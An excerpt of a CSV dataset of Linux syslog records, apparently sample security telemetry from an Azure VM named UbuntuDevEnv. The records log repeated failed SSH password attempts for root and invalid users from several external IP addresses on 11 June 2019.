+7758,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:19,UbuntuDevEnv,2019-06-11 13:01:19,auth,UbuntuDevEnv,info,Failed password for invalid user vmware from 89.101.149.137 port 20645 ssh2,90109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmware,89.101.149.1,20645,,
+7759,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:19,UbuntuDevEnv,2019-06-11 13:01:19,auth,UbuntuDevEnv,info,Disconnected from invalid user vmware 89.101.149.137 port 20645 [preauth],90109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmware,89.101.149.1,20645,,
+7760,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:19,UbuntuDevEnv,2019-06-11 13:01:19,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20654,90115,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20654,,
+7761,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:19,UbuntuDevEnv,2019-06-11 13:01:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137  user=root,90116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,89.101.149.1,,0,
+7762,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:20,UbuntuDevEnv,2019-06-11 13:01:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20765,90120,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20765,,
+7763,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:22,UbuntuDevEnv,2019-06-11 13:01:22,auth,UbuntuDevEnv,info,Failed password for root from 89.101.149.137 port 20655 ssh2,90116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20655,,
+7764,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:22,UbuntuDevEnv,2019-06-11 13:01:22,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 89.101.149.137 port 20655 [preauth],90116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,89.101.149.1,20655,,
+7765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:22,UbuntuDevEnv,2019-06-11 13:01:22,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20655:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90116,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20655,,
+7766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:22,UbuntuDevEnv,2019-06-11 13:01:22,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20836,90129,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20836,,
+7767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:22,UbuntuDevEnv,2019-06-11 13:01:22,auth,UbuntuDevEnv,info,Invalid user remotessh from 89.101.149.137 port 20837,90130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remotessh,89.101.149.1,20837,,
+7768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:22,UbuntuDevEnv,2019-06-11 13:01:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137,90130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,,0,
+7769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:22,UbuntuDevEnv,2019-06-11 13:01:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:24,UbuntuDevEnv,2019-06-11 13:01:24,auth,UbuntuDevEnv,info,Failed password for invalid user remotessh from 89.101.149.137 port 20837 ssh2,90130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remotessh,89.101.149.1,20837,,
+7771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:24,UbuntuDevEnv,2019-06-11 13:01:24,auth,UbuntuDevEnv,info,Disconnected from invalid user remotessh 89.101.149.137 port 20837 [preauth],90130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,remotessh,89.101.149.1,20837,,
+7772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:24,UbuntuDevEnv,2019-06-11 13:01:24,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 20837:3: com.jcraft.jsch.JSchException: Auth fail [preauth],90130,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,20837,,
+7773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:24,UbuntuDevEnv,2019-06-11 13:01:24,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 20847,90136,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,20847,,
+7774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:24,UbuntuDevEnv,2019-06-11 13:01:24,auth,UbuntuDevEnv,info,Invalid user guest from 89.101.149.137 port 20848,90137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,89.101.149.1,20848,,
+7775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:24,UbuntuDevEnv,2019-06-11 13:01:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,90137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:01:24,UbuntuDevEnv,2019-06-11 13:01:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=89.101.149.137,90137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,,0,
+7777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:03:20,UbuntuDevEnv,2019-06-11 13:03:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 22067,90547,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,22067,,
+7778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:04:20,UbuntuDevEnv,2019-06-11 13:04:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 23146,90758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,23146,,
+7779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:05:20,UbuntuDevEnv,2019-06-11 13:05:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 24709,90975,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,24709,,
+7780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:06:20,UbuntuDevEnv,2019-06-11 13:06:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 27675,91186,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,27675,,
+7781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:07:20,UbuntuDevEnv,2019-06-11 13:07:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 30792,91397,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,30792,,
+7782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:08:20,UbuntuDevEnv,2019-06-11 13:08:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 32226,91607,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,32226,,
+7783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:09:20,UbuntuDevEnv,2019-06-11 13:09:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 34179,91818,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,34179,,
+7784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:10:20,UbuntuDevEnv,2019-06-11 13:10:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 36817,92031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,36817,,
+7785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:11:20,UbuntuDevEnv,2019-06-11 13:11:20,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 38953,92247,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,38953,,
+7786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:11:44,UbuntuDevEnv,2019-06-11 13:11:43,auth,UbuntuDevEnv,info,Did not receive identification string from 89.101.149.137 port 39433,92328,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,89.101.149.1,39433,,
+7787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:11:44,UbuntuDevEnv,2019-06-11 13:11:43,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 89.101.149.137 port 39434 [preauth],92329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,89.101.149.1,39434,,
+7788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:11:44,UbuntuDevEnv,2019-06-11 13:11:43,auth,UbuntuDevEnv,err,error: Received disconnect from 89.101.149.137 port 39434:3: com.jcraft.jsch.JSchException: Auth fail [preauth],92329,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,89.101.149.1,39434,,
+7789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:29:14,UbuntuDevEnv,2019-06-11 13:29:13,auth,UbuntuDevEnv,info,Disconnected from 134.209.175.199 port 54046 [preauth],96094,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.175.1,54046,,
+7790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:29:14,UbuntuDevEnv,2019-06-11 13:29:13,auth,UbuntuDevEnv,info,Received disconnect from 134.209.175.199 port 54046:11: Bye Bye [preauth],96094,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.175.1,54046,,
+7791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:40:43,UbuntuDevEnv,2019-06-11 13:40:43,auth,UbuntuDevEnv,info,Received disconnect from 134.209.183.233 port 52296:11: Bye Bye [preauth],98889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.183.2,52296,,
+7792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:40:43,UbuntuDevEnv,2019-06-11 13:40:43,auth,UbuntuDevEnv,info,Disconnected from 134.209.183.233 port 52296 [preauth],98889,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.183.2,52296,,
+7793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:42:09,UbuntuDevEnv,2019-06-11 13:42:08,auth,UbuntuDevEnv,info,Received disconnect from 134.209.82.3 port 47584:11: Bye Bye [preauth],99189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.82.3,47584,,
+7794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 13:42:09,UbuntuDevEnv,2019-06-11 13:42:08,auth,UbuntuDevEnv,info,Disconnected from 134.209.82.3 port 47584 [preauth],99189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,134.209.82.3,47584,,
+7795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:11,UbuntuDevEnv,2019-06-11 14:07:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,104622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:13,UbuntuDevEnv,2019-06-11 14:07:12,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 49459 ssh2,104622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,49459,,
+7797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:28,UbuntuDevEnv,2019-06-11 14:07:27,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 49459: Too many authentication failures [preauth],104622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,49459,,
+7798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:28,UbuntuDevEnv,2019-06-11 14:07:27,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,104622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:28,UbuntuDevEnv,2019-06-11 14:07:27,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,104622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:28,UbuntuDevEnv,2019-06-11 14:07:27,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.180 port 49459 ssh2],104622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,49459,,
+7801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:28,UbuntuDevEnv,2019-06-11 14:07:27,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 49459 ssh2 [preauth],104622,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,49459,,
+7802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:34,UbuntuDevEnv,2019-06-11 14:07:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,104710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:36,UbuntuDevEnv,2019-06-11 14:07:35,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 3550 ssh2,104710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,3550,,
+7804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:40,UbuntuDevEnv,2019-06-11 14:07:38,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 3550 ssh2,104710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,3550,,
+7805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:41,UbuntuDevEnv,2019-06-11 14:07:41,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 3550 ssh2,104710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,3550,,
+7806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:52,UbuntuDevEnv,2019-06-11 14:07:51,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.180 port 3550: Too many authentication failures [preauth],104710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,3550,,
+7807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:52,UbuntuDevEnv,2019-06-11 14:07:51,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.180 port 3550 ssh2],104710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,3550,,
+7808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:52,UbuntuDevEnv,2019-06-11 14:07:51,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,104710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:52,UbuntuDevEnv,2019-06-11 14:07:51,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 3550 ssh2 [preauth],104710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,3550,,
+7810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:52,UbuntuDevEnv,2019-06-11 14:07:51,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,104710,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+7811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:57,UbuntuDevEnv,2019-06-11 14:07:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.180  user=root,104793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+7812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:07:59,UbuntuDevEnv,2019-06-11 14:07:59,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 22299 ssh2,104793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,22299,,
+7813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:02,UbuntuDevEnv,2019-06-11 14:08:01,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 22299 ssh2,104793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,22299,,
+7814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:04,UbuntuDevEnv,2019-06-11 14:08:04,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.180 port 22299 ssh2,104793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,22299,,
+7815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:13,UbuntuDevEnv,2019-06-11 14:08:13,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.180 port 22299 ssh2 [preauth],104793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,22299,,
+7816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:13,UbuntuDevEnv,2019-06-11 14:08:13,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 218.92.0.180 port 22299 ssh2],104793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,22299,,
+7817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-11 14:08:13,UbuntuDevEnv,2019-06-11 14:08:13,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,104793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
